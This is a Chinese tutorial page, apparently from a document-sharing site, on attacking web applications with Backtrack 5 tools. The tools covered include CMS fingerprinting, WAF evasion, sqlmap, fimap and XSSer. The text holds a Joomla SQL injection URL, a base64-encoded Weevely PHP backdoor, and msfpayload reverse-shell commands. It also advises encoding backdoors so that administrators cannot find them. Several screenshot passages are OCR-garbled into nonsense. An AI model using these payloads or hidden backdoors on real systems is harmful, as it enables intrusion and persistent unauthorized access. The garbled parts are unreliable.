




版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
1、用Backtrack進(jìn)行滲透測(cè)試評(píng)估Web應(yīng)用程序的分析在滲透測(cè)試和漏洞評(píng)估中發(fā)揮了重要的作用.確定Web應(yīng)用程序的正 確信息(例如使用的插件,CMS類(lèi)型等)都可以幫助測(cè)試者使用準(zhǔn)確的漏洞來(lái)測(cè)試,能夠降低 整個(gè)滲透測(cè)試漏洞評(píng)估所花費(fèi)的時(shí)間.Backtrack 5包含很多滲透測(cè)試信息收集所需要的工具.主要有以下幾個(gè)方面:CMS Identification(CMS 指紋鑒定)IDS/IPS Detection(IDS/IPS 的檢測(cè))Open Source Analysis(開(kāi)源分析)Web Crawlers(網(wǎng)絡(luò)爬蟲(chóng))Vulnerability Assessment and Exploitat
2、ion(脆 弱性評(píng)估和開(kāi)發(fā))Maintaining Access(維護(hù)訪問(wèn))1)CMS Identification(CMS 指紋鑒定):blindelephant cms-explorer whatwebBlindElephantBlind Elephant是一款基于python的Web應(yīng)用程序指紋識(shí)別工具.這款工具通過(guò)掃描某些已 知位置的靜態(tài)文件所使用的版本信息和hashes文件進(jìn)行比對(duì).Hashes文件中已經(jīng)提前計(jì)算 了相關(guān)Web應(yīng)用程序的版本信息.這款工具的優(yōu)勢(shì)是快速,非侵入性,低帶寬和高度自動(dòng)化 使用方法:BlindElephant.py options url appName不知道
3、Web應(yīng)用程序或者插件的類(lèi)型,我們可以用猜測(cè)的方法.例如;BlindElephant.py wordpressCMS-ExplorerCMS- Explorer是另外一款Web應(yīng)用程序指紋識(shí)別工具,是用perl腳本編寫(xiě)的.它可以確定使 用的CMS類(lèi)型,然后根據(jù)已知的漏洞資料進(jìn)行攻擊.這款工具有幾個(gè)優(yōu)勢(shì),可以從OSVDB(Open Source Vulnerability Database)中調(diào)用漏洞信息檢查任何特定插件或者CMS 是否存在漏洞.使用方法:python cms-explorer.pl -url target -type type optionsWhatWebWhatWeb可以用來(lái)
4、確定服務(wù)器使用的CMS、博客平臺(tái)、統(tǒng)計(jì)分析軟件包JavaScript庫(kù)等. 這個(gè)工具有超過(guò)900個(gè)插件用來(lái)掃描目標(biāo).使用方法:./whatweb 列出所有的插件用如下命令:./whatweb -l2)IDS/IPS detection(IDS/IPS 探測(cè)):在域環(huán)境下進(jìn)行風(fēng)險(xiǎn)評(píng)估和滲透測(cè)試的時(shí)候,有可能會(huì)遇到有安裝IDS/IPS的情況.IDS/IPS 有些時(shí)候能組織針對(duì)域環(huán)境的攻擊.WAF(Web入侵防御系統(tǒng))能很好的緩解入侵攻擊.但是WAF是很容易能夠檢測(cè)到的,因?yàn)楹芏嗍褂昧嘶诤灻臋z測(cè)方法,因此攻擊者可以通過(guò)對(duì)攻擊參數(shù)進(jìn)行編碼來(lái)繞過(guò)WAF.Backtrack有兩款檢測(cè)IDS/IPS的工
5、具:waffitua-testerWaffitWaffit是一款Web應(yīng)用防火墻檢測(cè)工具,檢測(cè)防火墻保護(hù)的站點(diǎn)是在滲透測(cè)試中非常重要的 一步.如果沒(méi)有對(duì)WAF進(jìn)行配置,有時(shí)候可能存在漏洞.在滲透測(cè)試和風(fēng)險(xiǎn)評(píng)估中分析WAF 也是非常重要的.通過(guò)編碼攻擊參數(shù),可以繞過(guò)WAF.使用方法:wafw00f.py 3)Open-Source Analyses(開(kāi)源代碼分析):Open-Source Analyses(開(kāi)放源碼分析)可以使用 GHDB,revhosts,xssed,maltego.GHDB 和XSSed需要進(jìn)入網(wǎng)站,其它的兩款是工具.GHDBGHDB(Google Hacking Datab
6、ase)的 exploit-db的團(tuán)隊(duì)收集了大量漏洞信息庫(kù)來(lái)方便滲透測(cè) 試人員.我們可以用服務(wù)器類(lèi)型等信息來(lái)尋找相關(guān)的漏洞.例如:“Microsoft-IIS/6.0 intitle:index.of”可以用來(lái)搜索運(yùn)行微軟iis6.0的服務(wù)器.Google Hacking DatabaseSdect categoryACKING-! ATA ASEWeb Server DetectionTTiese link; merab;di州Unions ef+ectedr lr5.13 coBponnii openstFO.o.o Rt5 unpatchd -:-), j北嶼BFlwmL 此4B5FVe
7、rs Un 5 Affeetod: 1,2.4 w Che cir: A pppn enls M o_5? f/Eptoit: NZAViilnarablt?心A* 28Inia -a CoHponnl; gqbio&la_firctiive catui Blind SCL Injection VkjlflerbilityVersions Aff&ctedt N/ACti&cfc: /co hpon em s/eaft_i joa ila_a reti i v e /index.php?op1iDn-con_ij。號(hào)1a_archive&task=archive&se*rch_archive-
8、Liactsea ixh&catid-l+snd+1-2Vulnsrable? YesW瞬還EW餡穿 i;::用海Exploit,Jmd彌,php?D()tiOh=cca2i 我夠即易Mrth_Mchi我=1 &眥t責(zé)紋rcMc釵hM十Md+Xl :: /KiFTi5dn perl使用方法:./joomscan.pl -u or IP addressjoomscan可以掃描到安裝的所有插件和相關(guān)的漏洞信息,利用這些信息我們可以進(jìn)一步進(jìn) 行攻擊.sqlmapsqlmap是一款很不錯(cuò)的進(jìn)行風(fēng)險(xiǎn)評(píng)估的工具.這款工具可以測(cè)試目標(biāo)URL是否存在脆弱性 漏洞.下面這個(gè)例子中紅色框中的參數(shù)Newid是具有脆
9、弱性漏洞的.使用方法如下:./sqlmap.py -u -fFimapFimap是一款基于python的工具,可以用來(lái)發(fā)現(xiàn),代碼審計(jì),漏洞利用等.使用方法:二index.php-u定義目標(biāo)URL掃描一個(gè)文本中的所有URL列表,命令如下:fimap -m -l /tmp/urlscan.txt-m批量掃描-l列表使用google批量搜索來(lái)掃描fimap.py -g -q inurl:include.php-g從Google搜索-q表示后面跟的是谷歌搜索的查詢條件fimap可以利用目標(biāo)漏洞,同時(shí)也可以上傳交互式的shell.XsserXsser是一款自動(dòng)的XSS漏洞檢測(cè)和利用報(bào)告的框架.它配備了繞
10、過(guò)過(guò)濾器和其它注射方式 的選項(xiàng).使用方法:./XSSer.py -u “”-g -user-agentcorrectaudit 這款工具提供了攻擊的URL,瀏覽器和攻擊方法等信息,一旦具有漏洞URL被檢測(cè)完成,我們 可以打開(kāi)網(wǎng)站,檢查確認(rèn).theHarvestortheHarvestor工具用于收集用戶的姓名,他們的電子郵件賬戶,主機(jī)名等信息,這款工具有助 于滲透測(cè)試人員在滲透測(cè)試和風(fēng)險(xiǎn)評(píng)估的初始階段使用.使用方法:./theHaervester.py -Id target domain -d data sourceWtiwh.iwitCT - pythonFile Edit ViW Sook
11、maFks Mekirigsgkeirg ;玉1(專python thtHirviister.py iiciDili 200 -b goagltI I I 4 i i *1* w TOC o 1-5 h z ,Th巴HarvBster Ver- 2.0 (reborn)iCflded Christian Martor&Ua *sEdgfr-SeorLtjr Rsearchcia rtfl roVl - ty.coi *I -1 Searching in Gaugle:S&archtng 100 results rStarching 200 results._ _Searching 390muI
12、姑_一 一一二- 一 一i, -i.jDaila1. uption. -1. s -iiilab. nsl.i*DiilaB b ik .iaIb r BNs24*oila,1 fe BIjboila. i1+ &ails Dlind;ftlJQCMldE*3 HflflU fpwndr-i-d ion i-bt-ltiH ve-t?rr |蜜 思凈L 庭件|澎渤心喧.另J或必WK:遂 W正在提取域和電子郵件相關(guān)的網(wǎng)站信息,可以幫助對(duì)有關(guān)目標(biāo)的進(jìn)一步攻擊或研究.Shodan這是另外一款非常不錯(cuò)的評(píng)估工具,可以用來(lái)收集目標(biāo)范圍內(nèi)的信息,比如鏈接在互聯(lián)網(wǎng)上 的設(shè)備,可以搜索任何網(wǎng)絡(luò)設(shè)備,如路由器,
13、網(wǎng)絡(luò)電話,打印機(jī),攝像等要搜索在域上運(yùn)行 的任何服務(wù),語(yǔ)法如下:Hostname: port:80,21,22或者干脆有關(guān)主機(jī)名的結(jié)果,如:Hostname:W3AFW3af是web代碼審計(jì)和應(yīng)用程序滲透測(cè)試工具。它分很多個(gè)模塊,如攻擊,審計(jì),開(kāi)發(fā),暴力 破解.所以這些都是可以針對(duì)性的使用,例如我們可以選擇審計(jì)模塊的sqli選項(xiàng),假設(shè)我們需 要執(zhí)行審計(jì)類(lèi)的特殊任務(wù).下圖顯示了一個(gè)目標(biāo)網(wǎng)站的簡(jiǎn)要流程圖,使得我們更容易理解.一旦掃描完成,W3AF框架顯示有關(guān)目標(biāo)網(wǎng)站的漏洞信息,可以為進(jìn)一步開(kāi)發(fā)針對(duì)性的漏洞 利用工具提供幫助.一旦發(fā)現(xiàn)漏洞,我們可以配置插件中的Exploit標(biāo)簽,并進(jìn)行進(jìn)一步的攻擊,
14、它可以幫助我們 得到一個(gè)目標(biāo)網(wǎng)站的webshell.另外一個(gè)優(yōu)點(diǎn)是w3af也是Metasploit下的一款工具,掃描的 結(jié)果可以導(dǎo)出為HTML的格式.6)Maintaining Access(維持訪問(wèn)):我們獲取一個(gè)目標(biāo)網(wǎng)站的權(quán)限之后,為了方便將來(lái)訪聞我們需要保留一個(gè)后門(mén),后門(mén)加密編 碼非常的重要,主要是為了防止被管理員輕易的檢測(cè)清除掉.Backtrack 5中上傳webshell的經(jīng)典工具有以下幾款:weevelyWeevely是一款隱蔽的PHP后門(mén).它提供一個(gè)類(lèi)似telnet的鏈接,鏈接之后可以執(zhí)行系統(tǒng)的 一些命令.使用動(dòng)態(tài)探測(cè)系統(tǒng)繞過(guò)PHP的安全性限制.Weevely探測(cè)system。,
15、passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl-system(), python_eval() 這些函數(shù),使用在遠(yuǎn)程服務(wù)器上啟用的函數(shù)功能.下面的代碼是使用weevely創(chuàng)建一個(gè)后門(mén)的 示例代碼:eval(base64_decode(cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbC
16、hiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=。 );使用方法:創(chuàng)建一個(gè)后門(mén)Weevely.py -g -o filename -p password這樣將創(chuàng)建一個(gè)具有特定名稱和密碼保護(hù)的后門(mén),上傳到目標(biāo)服務(wù)器使用如下命令;Weevely.py -t -u http:/remote-ip/backdoor.php -p infosecMsfPayloadMetasploit工具可以用來(lái)創(chuàng)建后門(mén),能夠維持我們對(duì)目標(biāo)服務(wù)器的訪問(wèn).需要使用到 msfpayload這款工具.我們需要選擇有效載荷,將通過(guò)反向鏈接生成一個(gè)shell,命令如下:msf msfpayload windows/meterpreter/reverse_tcp -R 來(lái)給輸出文件 RAW 數(shù)據(jù)格式.Msf msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1234 RMsfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 跨國(guó)公司授權(quán)經(jīng)銷(xiāo)合同范例
- 電子產(chǎn)品采購(gòu)合同(簡(jiǎn)易范本)
- 房屋托管合同版:條款詳解
- 建筑幕墻維修保養(yǎng)合同
- 合同:國(guó)產(chǎn)化項(xiàng)目-進(jìn)口直流電機(jī)電刷
- 新建停車(chē)場(chǎng)業(yè)主與開(kāi)發(fā)商委托合同
- 婚內(nèi)子女撫養(yǎng)合同范本
- 基礎(chǔ)設(shè)施建設(shè)項(xiàng)目土地征用合同樣本
- 家庭分家析產(chǎn)合同全文
- 20 蜘蛛開(kāi)店(教學(xué)設(shè)計(jì))-2023-2024學(xué)年統(tǒng)編版語(yǔ)文二年級(jí)下冊(cè)
- 護(hù)理不良事件管理、上報(bào)制度及流程
- GB 9706.224-2021醫(yī)用電氣設(shè)備第2-24部分:輸液泵和輸液控制器的基本安全和基本性能專用要求
- 子宮內(nèi)膜異位癥診療指南完整課件
- 人教版小學(xué)三年級(jí)下冊(cè)數(shù)學(xué)應(yīng)用題專項(xiàng)練習(xí)題40614
- 短視頻抖音運(yùn)營(yíng)培訓(xùn)課程
- 醫(yī)生個(gè)人學(xué)習(xí)心得五篇
- 合規(guī)理論知識(shí)考核試題題庫(kù)及答案
- 新版人教版七年級(jí)下冊(cè)語(yǔ)文全冊(cè)課件(2020最新版)
- MSDS物質(zhì)安全技術(shù)資料-洗面水
- 河南省地圖含市縣地圖矢量分層地圖行政區(qū)劃市縣概況ppt模板
- 績(jī)效管理全套ppt課件(完整版)
評(píng)論
0/150
提交評(píng)論